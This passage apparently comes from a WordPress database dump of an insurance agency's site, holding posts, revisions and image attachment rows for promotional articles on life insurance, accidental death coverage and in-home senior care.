differ in that term life insurance only covers the insured for a set amount of time, while whole life insurance can cover the insured for their whole life (or until the policy is canceled).\r\n\r\nUltimately, when deciding on what type of life insurance policy to consider, your decision should be based on what you can afford, what you need, and your personal circumstances. Every young family is different, so there is no one-size-fits-all solution to selecting life insurance.\r\n<h3>Closing</h3>\r\nYoung families can perhaps benefit the most from a life insurance policy, as it can be one of the most important purchases any young family can make. While there is no one-size-fits-all to life insurance, young families should explore their options and consult a financial professional or insurance agent before making a selection.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','Why Young Families Need Life Insurance','','publish','open','open','','why-young-families-need-life-insurance','','','2023-03-19 17:41:59','2023-03-19 17:41:59','',0,'http://cmdev-site1.com/?p=74',0,'post','',0),(75,1,'2023-03-01 14:21:42','2023-03-01 14:21:42','Parents and their children are looking at camera.','Parents and their children are looking at camera.','','inherit','open','closed','','parents-and-their-children-are-looking-at-camera','','','2023-03-01 14:21:59','2023-03-01 14:21:59','',74,'http://cmdev-site1.com/wp-content/uploads/2023/03/Happy-Family-1000x634-1.jpg',0,'attachment','image/jpeg',0),(76,1,'2023-03-01 14:23:59','2023-03-01 14:23:59','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\n<div></div>\r\n<div class=\"article_info\">Many Americans believe life insurance to be a necessity and include life insurance as part of their regular financial planning. With its ability to fill a variety of needs, like providing supplemental income or helping pay for college, life insurance can help young families provide continued financial security to their loved ones.</div>\r\n<div></div>\r\n<div class=\"article_info\">For this reason, it’s no surprise that many Americans believe that life insurance can be the most important purchase they make. But do young American families really need to consider purchasing life insurance so soon?</div>\r\n&nbsp;\r\n<h3>Why Young Families Should Consider Life Insurance</h3>\r\nLife insurance may be the most important purchase you make in your family. Why? Because it could help contribute to your family’s continued financial stability, security, and lifestyle in the event that something should happen to you or your spouse.\r\n\r\nAsk yourself, what would happen if you or your partner should die unexpectedly? How would bills get paid? Could your family’s financial security and well-being be put in jeopardy? Will your family be able to continue living in their home without your financial support?\r\n\r\nIf asking yourself these questions made you pause with uncertainty, it may be time to consider purchasing life insurance.\r\n<h3>What Young Families Should Know Before Selecting a Life Insurance Policy</h3>\r\nNow that you know you may need a life insurance policy, what type of policy should you consider purchasing? There are a few types of life insurance policies young families can choose from, with the most common options being term and whole life insurance.\r\n\r\nTerm life insurance and whole life insurance differ in that term life insurance only covers the insured for a set amount of time, while whole life insurance can cover the insured for their whole life (or until the policy is canceled).\r\n\r\nUltimately, when deciding on what type of life insurance policy to consider, your decision should be based on what you can afford, what you need, and your personal circumstances. Every young family is different, so there is no one-size-fits-all solution to selecting life insurance.\r\n<h3>Closing</h3>\r\nYoung families can perhaps benefit the most from a life insurance policy, as it can be one of the most important purchases any young family can make. While there is no one-size-fits-all to life insurance, young families should explore their options and consult a financial professional or insurance agent before making a selection.','Why Young Families Need Life Insurance','','inherit','closed','closed','','74-revision-v1','','','2023-03-01 14:23:59','2023-03-01 14:23:59','',74,'http://cmdev-site1.com/?p=76',0,'revision','',0),(77,1,'2023-03-01 14:32:09','2023-03-01 14:32:09','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Kat Donovan</span></div>\r\n<div class=\"article_info_bottom_line\"></div>\r\nWhile we cannot predict the future, we can always try and plan ahead. Life insurance is a great way to help your family plan for the future, as it can help to alleviate some financial pains on the chance a family member passes sooner than we hope.\r\n\r\nTo gather a better understanding of how life insurance can be used to create a future plan for your family, consider the four ways below.\r\n<h3>Funeral Expenses</h3>\r\nOne perk of buying life insurance is knowing you will be able to cover much, if not all, of the funeral expenses.<sup>1</sup> Considering funerals can be expensive, it can be smart to have this in your back pocket in case a family member dies. It helps you to plan because your day to day income and your savings shouldn’t be needed to cover these unexpected expenses.\r\n<h3>Mortgages</h3>\r\nHaving a family, you may have taken the jump to invest in a house. Unfortunately, if you die before it is paid off, that debt goes to your loved ones.<sup>2</sup> Your loved ones, unless they are particularly wealthy, may struggle to make payments to finish this line of debt.\r\n\r\nBy buying life insurance, you are planning for your family’s future to make sure any debt you may have left to them is minimal.\r\n<h3>Education</h3>\r\nMost people view college as a stepping stone and a necessity to getting good jobs. However, college can get very expensive. While there are different plans families use to save for college, you can also use life insurance.<sup>3</sup>\r\n\r\nA whole life plan has an added cash value where you may save your money tax-deferred a majority of the time.\r\n\r\nGenerally, you are able to borrow against this savings account associated with your life insurance policy to pay for college.<sup>3</sup> Life insurance can help your family plan for the future by ensuring their secondary education will be more affordable.\r\n<h3>Income</h3>\r\nDepending on your situation, you may be the breadwinner in your household. If you were to die, others would be lost without your income. Life insurance helps to make sure there is a source of funding for those dependent upon you after you pass.<sup>4</sup> You are helping to plan for your family’s future by attempting to ensure their financial stability regardless of whether you are alive.\r\n\r\nThere are so many wild cards in life. It’s hard to know where you will be in a week, let alone next year. To help you and your family plan for the future, look to a licensed life insurance agent in your area. They will be able to give you more information and knowledge on the best policy for your situation.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em><span style=\"font-size: 8pt;\">Sources:</span></em>\r\n</span><span style=\"font-size: 8pt;\">1. SmartAsset, Final Expense Insurance, 2018, <a href=\"https://smartasset.com/life-insurance/final-expense-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://smartasset.com/life-insurance/final-expense-insurance</a></span>\r\n<span style=\"font-size: 8pt;\">2. SmartAsset, Mortgage Protection Life Insurance, 2019, <a href=\"https://smartasset.com/life-insurance/mortgage-protection-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://smartasset.com/life-insurance/mortgage-protection-life-insurance</a></span>\r\n<span style=\"font-size: 8pt;\">3. Investopedia, Life Insurance VS 529, 2020, <a href=\"https://www.investopedia.com/articles/personal-finance/102915/life-insurance-vs-529.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/102915/life-insurance-vs-529.asp</a></span>\r\n<span style=\"font-size: 8pt;\">4. Investopedia, How Much Life Insurance Should You Carry? 2019, <a href=\"https://www.investopedia.com/articles/pf/06/insureneeds.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/pf/06/insureneeds.asp</a></span>','4 Ways Life Insurance Helps Families Plan For The Future','','publish','open','open','','4-ways-life-insurance-helps-families-plan-for-the-future','','','2023-03-19 17:42:27','2023-03-19 17:42:27','',0,'http://cmdev-site1.com/?p=77',0,'post','',0),(78,1,'2023-03-01 14:31:36','2023-03-01 14:31:36','concept of housing and relocation. happy family mother father and kids with roof at a  home','concept of housing and relocation. happy family mother father and kids with roof at home','','inherit','open','closed','','concept-of-housing-and-relocation-happy-family-mother-father-and-kids-with-roof-at-home','','','2023-03-01 14:31:54','2023-03-01 14:31:54','',77,'http://cmdev-site1.com/wp-content/uploads/2023/03/concept-of-housing-and-relocation.-happy-family-mother-father-and-kids-with-roof-at-home-1000x660-1.jpg',0,'attachment','image/jpeg',0),(79,1,'2023-03-01 14:32:09','2023-03-01 14:32:09','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Kat Donovan</span></div>\r\n<div class=\"article_info_bottom_line\"></div>\r\nWhile we cannot predict the future, we can always try and plan ahead. Life insurance is a great way to help your family plan for the future, as it can help to alleviate some financial pains on the chance a family member passes sooner than we hope.\r\n\r\nTo gather a better understanding of how life insurance can be used to create a future plan for your family, consider the four ways below.\r\n<h3>Funeral Expenses</h3>\r\nOne perk of buying life insurance is knowing you will be able to cover much, if not all, of the funeral expenses.<sup>1</sup> Considering funerals can be expensive, it can be smart to have this in your back pocket in case a family member dies. It helps you to plan because your day to day income and your savings shouldn’t be needed to cover these unexpected expenses.\r\n<h3>Mortgages</h3>\r\nHaving a family, you may have taken the jump to invest in a house. Unfortunately, if you die before it is paid off, that debt goes to your loved ones.<sup>2</sup> Your loved ones, unless they are particularly wealthy, may struggle to make payments to finish this line of debt.\r\n\r\nBy buying life insurance, you are planning for your family’s future to make sure any debt you may have left to them is minimal.\r\n<h3>Education</h3>\r\nMost people view college as a stepping stone and a necessity to getting good jobs. However, college can get very expensive. While there are different plans families use to save for college, you can also use life insurance.<sup>3</sup>\r\n\r\nA whole life plan has an added cash value where you may save your money tax-deferred a majority of the time.\r\n\r\nGenerally, you are able to borrow against this savings account associated with your life insurance policy to pay for college.<sup>3</sup> Life insurance can help your family plan for the future by ensuring their secondary education will be more affordable.\r\n<h3>Income</h3>\r\nDepending on your situation, you may be the breadwinner in your household. If you were to die, others would be lost without your income. Life insurance helps to make sure there is a source of funding for those dependent upon you after you pass.<sup>4</sup> You are helping to plan for your family’s future by attempting to ensure their financial stability regardless of whether you are alive.\r\n\r\nThere are so many wild cards in life. It’s hard to know where you will be in a week, let alone next year. To help you and your family plan for the future, look to a licensed life insurance agent in your area. They will be able to give you more information and knowledge on the best policy for your situation.\r\n\r\n<span style=\"font-size: 10pt;\">Sources:\r\n</span><span style=\"font-size: 8pt;\">1. SmartAsset, Final Expense Insurance, 2018, <a href=\"https://smartasset.com/life-insurance/final-expense-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://smartasset.com/life-insurance/final-expense-insurance</a></span>\r\n<span style=\"font-size: 8pt;\">2. SmartAsset, Mortgage Protection Life Insurance, 2019, <a href=\"https://smartasset.com/life-insurance/mortgage-protection-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://smartasset.com/life-insurance/mortgage-protection-life-insurance</a></span>\r\n<span style=\"font-size: 8pt;\">3. Investopedia, Life Insurance VS 529, 2020, <a href=\"https://www.investopedia.com/articles/personal-finance/102915/life-insurance-vs-529.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/102915/life-insurance-vs-529.asp</a></span>\r\n<span style=\"font-size: 8pt;\">4. Investopedia, How Much Life Insurance Should You Carry? 2019, <a href=\"https://www.investopedia.com/articles/pf/06/insureneeds.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/pf/06/insureneeds.asp</a></span>','4 Ways Life Insurance Helps Families Plan For The Future','','inherit','closed','closed','','77-revision-v1','','','2023-03-01 14:32:09','2023-03-01 14:32:09','',77,'http://cmdev-site1.com/?p=79',0,'revision','',0),(80,1,'2023-03-01 14:41:41','2023-03-01 14:41:41','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\r\n<div></div>\r\n<div class=\"article_info\">You purchased a life insurance policy to help protect your beneficiaries in the event of your passing. Whether you secured a policy due to your growing family, the purchase of a home, or some other life change, you recognized your family would need additional financial resources to help them in the event you pass.</div>\r\n&nbsp;\r\n\r\nBut how do you know how much life insurance coverage is enough? When is the right time to assess your life insurance options? In this article, we’ll explore three ways to help you know you should increase your life insurance coverage.\r\n<h3>Sign #1: You Make More Money</h3>\r\nWhen your income increases, so does the financial gap left behind in the event of your passing. Many consumers purchase life insurance as a way to help cover their income up to a certain amount after they pass away. If your income increases—especially if it dramatically increases—it may be time to look at your life insurance policy’s coverage limits and assess whether it’s a good idea to increase your insurance benefits.<sup>1</sup>\r\n<h3>Sign #2: You Grow Your Family</h3>\r\nAccording to the U.S. Department of Agriculture, the approximate cost of raising a child born in 2015 through age 17 for middle-income, married-couple parents is $233,610.<sup>2</sup> That figure doesn’t even include the costs of college tuition.\r\n\r\nWhen you decide to have a child or expand your family, it’s important to consider the costs of taking care of that child in the event of your passing. Evaluate what expenses they may need covered throughout childhood and beyond.\r\n\r\nThink about your financial goals and what savings vehicles you have in place for your family while you’re living. Consider how those financial needs might change once you’re gone. You may conclude you need to increase your life insurance benefits.\r\n<h3>Sign #3: You Acquire More Assets</h3>\r\nIf you make more money, purchase a house, or acquire other valuable assets, it may be time to increase your life insurance coverage limits. This is especially true for any resources you finance long-term.\r\n\r\nIf you have an asset that a spouse or partner cosigns on (such as a house), your partner will likely be left with the responsibility of paying for that home even after you’re gone. If your consistent income is a factor in the ability to comfortably repay the loans, then you might want to take a look at your life insurance coverage.\r\n\r\nLife insurance may cover much of the financial responsibility left behind in the event of your passing. It’s critical to assess your coverage when you acquire big-ticket assets.\r\n<h3>Conclusion</h3>\r\nThese three signs aren’t a comprehensive list. When planning your life insurance coverage, there are a number of factors to consider. Contact your life insurance agent or financial advisor to go through your individual financial situation to help make the best plan for your family.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em><span style=\"font-size: 8pt;\">Sources:</span></em>\r\n</span><em><span style=\"font-size: 8pt;\">1. <a href=\"https://lifehappens.org/\" target=\"_blank\" rel=\"noopener noreferrer\">Life Happens</a>, 5 Signs You Need to Up Your Life Insurance Coverage, 2018</span></em>\r\n<em><span style=\"font-size: 8pt;\">2. <a href=\"https://www.usda.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">USDA</a>, The Cost of Raising a Child, 2020</span></em>','3 Ways To Know It\'s Time To Increase Your Life Insurance Coverage','','publish','open','open','','3-ways-to-know-its-time-to-increase-your-life-insurance-coverage','','','2023-03-19 17:42:59','2023-03-19 17:42:59','',0,'http://cmdev-site1.com/?p=80',0,'post','',0),(81,1,'2023-03-01 14:40:49','2023-03-01 14:40:49','Woman\'s hands showing one, two and three fingers','','','inherit','open','closed','','one-two-and-three','','','2023-03-01 14:41:25','2023-03-01 14:41:25','',80,'http://cmdev-site1.com/wp-content/uploads/2023/03/Child-hands-showing-one-two-and-three-fingers-1000x667-1.jpg',0,'attachment','image/jpeg',0),(82,1,'2023-03-01 14:41:41','2023-03-01 14:41:41','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\r\n<div></div>\r\n<div class=\"article_info\">You purchased a life insurance policy to help protect your beneficiaries in the event of your passing. Whether you secured a policy due to your growing family, the purchase of a home, or some other life change, you recognized your family would need additional financial resources to help them in the event you pass.</div>\r\n&nbsp;\r\n\r\nBut how do you know how much life insurance coverage is enough? When is the right time to assess your life insurance options? In this article, we’ll explore three ways to help you know you should increase your life insurance coverage.\r\n<h3>Sign #1: You Make More Money</h3>\r\nWhen your income increases, so does the financial gap left behind in the event of your passing. Many consumers purchase life insurance as a way to help cover their income up to a certain amount after they pass away. If your income increases—especially if it dramatically increases—it may be time to look at your life insurance policy’s coverage limits and assess whether it’s a good idea to increase your insurance benefits.<sup>1</sup>\r\n<h3>Sign #2: You Grow Your Family</h3>\r\nAccording to the U.S. Department of Agriculture, the approximate cost of raising a child born in 2015 through age 17 for middle-income, married-couple parents is $233,610.<sup>2</sup> That figure doesn’t even include the costs of college tuition.\r\n\r\nWhen you decide to have a child or expand your family, it’s important to consider the costs of taking care of that child in the event of your passing. Evaluate what expenses they may need covered throughout childhood and beyond.\r\n\r\nThink about your financial goals and what savings vehicles you have in place for your family while you’re living. Consider how those financial needs might change once you’re gone. You may conclude you need to increase your life insurance benefits.\r\n<h3>Sign #3: You Acquire More Assets</h3>\r\nIf you make more money, purchase a house, or acquire other valuable assets, it may be time to increase your life insurance coverage limits. This is especially true for any resources you finance long-term.\r\n\r\nIf you have an asset that a spouse or partner cosigns on (such as a house), your partner will likely be left with the responsibility of paying for that home even after you’re gone. If your consistent income is a factor in the ability to comfortably repay the loans, then you might want to take a look at your life insurance coverage.\r\n\r\nLife insurance may cover much of the financial responsibility left behind in the event of your passing. It’s critical to assess your coverage when you acquire big-ticket assets.\r\n<h3>Conclusion</h3>\r\nThese three signs aren’t a comprehensive list. When planning your life insurance coverage, there are a number of factors to consider. Contact your life insurance agent or financial advisor to go through your individual financial situation to help make the best plan for your family.\r\n\r\n<span style=\"font-size: 10pt;\">Sources:\r\n</span><em><span style=\"font-size: 8pt;\">1. <a href=\"https://lifehappens.org/\" target=\"_blank\" rel=\"noopener noreferrer\">Life Happens</a>, 5 Signs You Need to Up Your Life Insurance Coverage, 2018</span></em>\r\n<em><span style=\"font-size: 8pt;\">2. <a href=\"https://www.usda.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">USDA</a>, The Cost of Raising a Child, 2020</span></em>','3 Ways To Know It\'s Time To Increase Your Life Insurance Coverage','','inherit','closed','closed','','80-revision-v1','','','2023-03-01 14:41:41','2023-03-01 14:41:41','',80,'http://cmdev-site1.com/?p=82',0,'revision','',0),(83,1,'2023-03-01 14:42:53','2023-03-01 14:42:53','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\nMany seniors are able to lead independent lives. But the aging process often requires getting in-home care or moving to assisted living so you or a loved one can continue leading a happy and fulfilling life.\n\nWhile the decision to opt for in-home care for yourself or a loved one is a very personal one, this article aims to help you decide when the time is right. There are considerations that both the senior and the caregiver should take into consideration.\n<h3>Senior Signs</h3>\nHere are five signs seniors may exhibit that could help you recognize it’s time for a senior to consider in-home care or moving to an assisted living facility:<sup>1</sup>\n<ol>\n 	<li>Behavior changes</li>\n 	<li>Assistance with hygiene needed</li>\n 	<li>Worsening health conditions</li>\n 	<li>Increasing number of falls or accidents</li>\n 	<li>Signs of neglect around the home</li>\n</ol>\nThese can often be in conjunction with one another.\n<h3>Caregiver Signs</h3>\nIt is also important that the concerns of those providing care for family members be taken into consideration. As a caregiver, you cannot give your best if you are struggling to balance caring for your senior with other responsibilities like your work and family.<sup>2</sup>\n\nCaregivers may exhibit three signs that could help you recognize it’s time for a senior to consider in-home care or moving to an assisted living facility:<sup>3</sup>\n<ol>\n 	<li>Emotional burnout</li>\n 	<li>Physical burnout</li>\n 	<li>Role confusion</li>\n</ol>\nThe transition to getting in-home care or moving to assisted living is a sensitive and personal decision.\n\nRecognizing some signs of decline in seniors and caregivers may help ease the transition. Communication and coordination between caregivers and seniors are key throughout the aging process.<sup>2</sup>\n\n<span style=\"font-size: 8pt;\">Sources:</span>\n<div>\n\n<span style=\"font-size: 8pt;\"><em>1. WAHCA, 5 Signs That It Might Be Time to Consider Home Care, 2019, <a href=\"https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/\" target=\"_blank\" rel=\"noopener noreferrer\">https://wahca.org/home-care/in-home-care/5-signs-that-it-might-be-time-to-consider-home-care/</a></em></span>\n\n<span style=\"font-size: 8pt;\"><em>2. Johns Hopkins Medicine, Caregiving: Knowing When It’s Time for In-Home Help, 2021, <a href=\"https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.hopkinsmedicine.org/health/wellness-and-prevention/caregiving-knowing-when-its-time-for-in-home-help</a></em></span>\n\n<span style=\"font-size: 8pt;\"><em>3. Assistedliving.org, 5 Signs It’s Time to Hire a Home Health Aide, n.d. 2021, <a href=\"https://www.assistedliving.org/hire-a-home-health-aide/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.assistedliving.org/hire-a-home-health-aide/</a></em></span>\n\n</div>','Key Signs It’s Time To Get In-Home Care Or Move To An Assisted Living Facility','','inherit','closed','closed','','54-autosave-v1','','','2023-03-01 14:42:53','2023-03-01 14:42:53','',54,'http://cmdev-site1.com/?p=83',0,'revision','',0),(85,1,'2023-03-01 14:44:43','2023-03-01 14:44:43','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\n<div></div>\n<div class=\"article_info\">This situation may be familiar to you: You’ve made the decision to help protect your family and are considering purchasing life insurance as a means to do so. However, as you start looking into life insurance options, you begin to feel overwhelmed by the amount of choices available to you and may even be confused if you qualify for life insurance.</div>\n<div></div>\n<div class=\"article_info\">In this article, we’ll discuss one specific type of whole life insurance: graded death benefit whole life insurance. Read on to learn more about what a graded death benefit whole life insurance policy is, how it works, and considerations to make before purchasing it.</div>\n&nbsp;\n\nGraded death benefit whole life policies are a type of whole life insurance. Life insurance policies are offered in two major types: term life and whole life policies.\n\n<a href=\"https://www.globelifeinsurance.com/article/how-long-term-life-policy\" target=\"_blank\" rel=\"noopener noreferrer\">Term life insurance</a> is a type of life insurance policy that pays a stated death benefit in the event the person insured dies during the specified term of coverage.\n\n<a href=\"https://www.globelifeinsurance.com/article/what-is-whole-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">Traditional whole life insurance</a>, meanwhile, provides permanent death benefit coverage for the life of the insured. Whole life insurance may also carry a cash value component, which allows the policyholder to build <a href=\"https://home.globelifeinsurance.com/articles/august-2020/can-whole-life-insurance-be-used-to-save-for-c-(1)\" target=\"_blank\" rel=\"noopener noreferrer\">cash value</a> after a certain amount of time via the payment of premiums.\n\nWhat are the requirements for purchasing life insurance? Is a medical exam or health application required?\n\nLife insurance providers may require you to provide evidence of insurability prior to issuing you coverage. Evidence of insurability may involve you undergoing a medical exam or answering a health questionnaire.\n\nThis is not a comprehensive list of requirements that may be involved in purchasing life insurance.\n<h3>What is a graded death benefit whole life insurance policy?</h3>\nA graded death benefit whole life insurance policy is a type of whole life insurance. It may provide people not approved for standard life insurance an option to purchase life insurance.\n\nWhy? A medical exam is usually not required for a graded death benefit whole life insurance policy. As such, it may be an attractive option for people who have been declined for coverage due to personal health or other reasons like heart conditions, cancer, or even stroke.\n<h3>How does a graded death benefit whole life insurance policy work?</h3>\nA graded death benefit whole life insurance policy often works like a normal whole life insurance policy, except it usually has a waiting period, typically two to three years, before it will pay the full amount of death benefits. In the event your death occurs during the waiting period, a graded death benefit whole life insurance policy may pay a lower amount to your beneficiaries.\n\nWhat might you consider before purchasing a graded death benefit whole life insurance policy?\n\nYou may want to consider the following before purchasing a graded death benefit whole life insurance policy:\n<ol>\n 	<li><strong>Consider your health.</strong>\nA graded death benefit whole life insurance policy may offer those with significant risk factors a way to get life insurance. It may also be an appropriate option for you if you consider undergoing a health exam or a more exhaustive health screening a hassle.</li>\n 	<li><strong>Consider whether or not you want a type of whole life insurance policy.</strong>\nA graded death benefit policy is a type of whole life insurance. It provides coverage for the life of the insured, unlike term life insurance policies that expire after a certain time period.</li>\n 	<li><strong>Consider the waiting period and associated premiums.</strong>\nPremiums usually do not increase year-to-year for a graded death benefit whole life insurance policy. After the waiting period, the policy’s benefits will increase to the face value—the full insurance coverage amount—of the policy.</li>\n</ol>\nThis is not a comprehensive list of factors you may want to consider before purchasing a graded death benefit whole life insurance policy.\n<h3>A graded death benefit whole life insurance policy may be a helpful insurance coverage option for you.</h3>\nA graded death whole life insurance policy may be a helpful insurance coverage option for you. It may be able to help provide you with financial protection if you would not otherwise qualify for life insurance due to a pre-existing or chronic health condition or illness. A graded death benefit whole life insurance policy may require a waiting period to pass before paying out on the policy.\n\nContact a licensed insurance professional to find out more about graded death benefit whole life insurance policies and to discuss your insurance needs.','How Does A Graded Death Benefit Whole Life Insurance Policy Work?','','inherit','closed','closed','','57-autosave-v1','','','2023-03-01 14:44:43','2023-03-01 14:44:43','',57,'http://cmdev-site1.com/?p=85',0,'revision','',0),(86,1,'2023-03-01 14:45:06','2023-03-01 14:45:06','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\r\n<div></div>\r\n<div class=\"article_info\">This situation may be familiar to you: You’ve made the decision to help protect your family and are considering purchasing life insurance as a means to do so. However, as you start looking into life insurance options, you begin to feel overwhelmed by the amount of choices available to you and may even be confused if you qualify for life insurance.</div>\r\n<div></div>\r\n<div class=\"article_info\">In this article, we’ll discuss one specific type of whole life insurance: graded death benefit whole life insurance. Read on to learn more about what a graded death benefit whole life insurance policy is, how it works, and considerations to make before purchasing it.</div>\r\n&nbsp;\r\n\r\nGraded death benefit whole life policies are a type of whole life insurance. Life insurance policies are offered in two major types: term life and whole life policies.\r\n\r\n<a href=\"https://www.globelifeinsurance.com/article/how-long-term-life-policy\" target=\"_blank\" rel=\"noopener noreferrer\">Term life insurance</a> is a type of life insurance policy that pays a stated death benefit in the event the person insured dies during the specified term of coverage.\r\n\r\n<a href=\"https://www.globelifeinsurance.com/article/what-is-whole-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">Traditional whole life insurance</a>, meanwhile, provides permanent death benefit coverage for the life of the insured. Whole life insurance may also carry a cash value component, which allows the policyholder to build <a href=\"https://home.globelifeinsurance.com/articles/august-2020/can-whole-life-insurance-be-used-to-save-for-c-(1)\" target=\"_blank\" rel=\"noopener noreferrer\">cash value</a> after a certain amount of time via the payment of premiums.\r\n\r\nWhat are the requirements for purchasing life insurance? Is a medical exam or health application required?\r\n\r\nLife insurance providers may require you to provide evidence of insurability prior to issuing you coverage. Evidence of insurability may involve you undergoing a medical exam or answering a health questionnaire.\r\n\r\nThis is not a comprehensive list of requirements that may be involved in purchasing life insurance.\r\n<h3>What is a graded death benefit whole life insurance policy?</h3>\r\nA graded death benefit whole life insurance policy is a type of whole life insurance. It may provide people not approved for standard life insurance an option to purchase life insurance.\r\n\r\nWhy? A medical exam is usually not required for a graded death benefit whole life insurance policy. As such, it may be an attractive option for people who have been declined for coverage due to personal health or other reasons like heart conditions, cancer, or even stroke.\r\n<h3>How does a graded death benefit whole life insurance policy work?</h3>\r\nA graded death benefit whole life insurance policy often works like a normal whole life insurance policy, except it usually has a waiting period, typically two to three years, before it will pay the full amount of death benefits. In the event your death occurs during the waiting period, a graded death benefit whole life insurance policy may pay a lower amount to your beneficiaries.\r\n\r\nWhat might you consider before purchasing a graded death benefit whole life insurance policy?\r\n\r\nYou may want to consider the following before purchasing a graded death benefit whole life insurance policy:\r\n<ol>\r\n 	<li><strong>Consider your health.</strong>\r\nA graded death benefit whole life insurance policy may offer those with significant risk factors a way to get life insurance. It may also be an appropriate option for you if you consider undergoing a health exam or a more exhaustive health screening a hassle.</li>\r\n 	<li><strong>Consider whether or not you want a type of whole life insurance policy.</strong>\r\nA graded death benefit policy is a type of whole life insurance. It provides coverage for the life of the insured, unlike term life insurance policies that expire after a certain time period.</li>\r\n 	<li><strong>Consider the waiting period and associated premiums.</strong>\r\nPremiums usually do not increase year-to-year for a graded death benefit whole life insurance policy. After the waiting period, the policy’s benefits will increase to the face value—the full insurance coverage amount—of the policy.</li>\r\n</ol>\r\nThis is not a comprehensive list of factors you may want to consider before purchasing a graded death benefit whole life insurance policy.\r\n<h3>A graded death benefit whole life insurance policy may be a helpful insurance coverage option for you.</h3>\r\nA graded death whole life insurance policy may be a helpful insurance coverage option for you. It may be able to help provide you with financial protection if you would not otherwise qualify for life insurance due to a pre-existing or chronic health condition or illness.\r\n\r\nA graded death benefit whole life insurance policy may require a waiting period to pass before paying out on the policy.\r\n\r\nContact a licensed insurance professional to find out more about graded death benefit whole life insurance policies and to discuss your insurance needs.','How Does A Graded Death Benefit Whole Life Insurance Policy Work?','','inherit','closed','closed','','57-revision-v1','','','2023-03-01 14:45:06','2023-03-01 14:45:06','',57,'http://cmdev-site1.com/?p=86',0,'revision','',0),(87,1,'2023-03-01 14:46:17','2023-03-01 14:46:17','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\nWhen many of us think of our passing, we imagine it will be something that doesn’t happen until well into our old age. But what happens if the unthinkable happens and your life is taken in an accident?\n\nAccording to the CDC, each year, there are more than 170,000 deaths attributed to unintentional injuries, including motor vehicle accidents.<sup>1</sup>\n<h3>Simply put: Accidents happen.</h3>\nSo, are you and your loved ones prepared in the event of a fatal accident? In this article, we’ll explore some ways you can shore up your life insurance protection to help benefit your loved ones in the event of your untimely (and accidental) passing.\n<h3>What is accidental death insurance?</h3>\nAccidental death insurance is often a clause or rider connected to a life insurance policy. It provides additional benefits to beneficiaries in the event the insured passes away under the coverage period from a covered accident. The insured often pays an additional premium if this rider is added to their existing policy.\n<h3>What is considered an “accidental death”?</h3>\nAccidental deaths, in the eyes of many insurance companies, are those that occur as the result of an incident that’s caused by forces outside of your control.\n\nThink of car crashes, slips and falls, choking, drowning, machine accidents, and other situations that cannot be controlled and are deemed by the insurance company to be an accident.\n\nIncidences of an accidental death that stem from a hazardous activity, such as race car driving, base jumping, or sky diving, often aren’t covered under accidental death coverage. This is subject to the insurance company’s specific policy terms. Death from an illness is excluded. Deaths stemming from illegal activities can be excluded as well.\n<h3>Why might you want to consider accidental death coverage?</h3>\nAdding additional coverage to an existing life insurance policy can be a helpful benefit for your loved ones and beneficiaries. They can be even better protected in the event of your sudden, unforeseen passing.\n\nThe addition of accidental death coverage to your existing life insurance policy can provide extra help for your family in their time of need if they were to lose you to an accident.\n\n<span style=\"font-size: 10pt;\">Sources:\n</span><em><span style=\"font-size: 8pt;\">1. <a href=\"https://www.cdc.gov/nchs/fastats/accidental-injury.htm\" target=\"_blank\" rel=\"noopener noreferrer\">CDC, Accidents or Unintentional Injuries</a>, 2021</span></em>','Do I need Accidental Death Insurance?','','inherit','closed','closed','','61-autosave-v1','','','2023-03-01 14:46:17','2023-03-01 14:46:17','',61,'http://cmdev-site1.com/?p=87',0,'revision','',0),(88,1,'2023-03-01 14:46:24','2023-03-01 14:46:24','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\nWhen many of us think of our passing, we imagine it will be something that doesn’t happen until well into our old age. But what happens if the unthinkable happens and your life is taken in an accident?\r\n\r\nAccording to the CDC, each year, there are more than 170,000 deaths attributed to unintentional injuries, including motor vehicle accidents.<sup>1</sup>\r\n<h3>Simply put: Accidents happen.</h3>\r\nSo, are 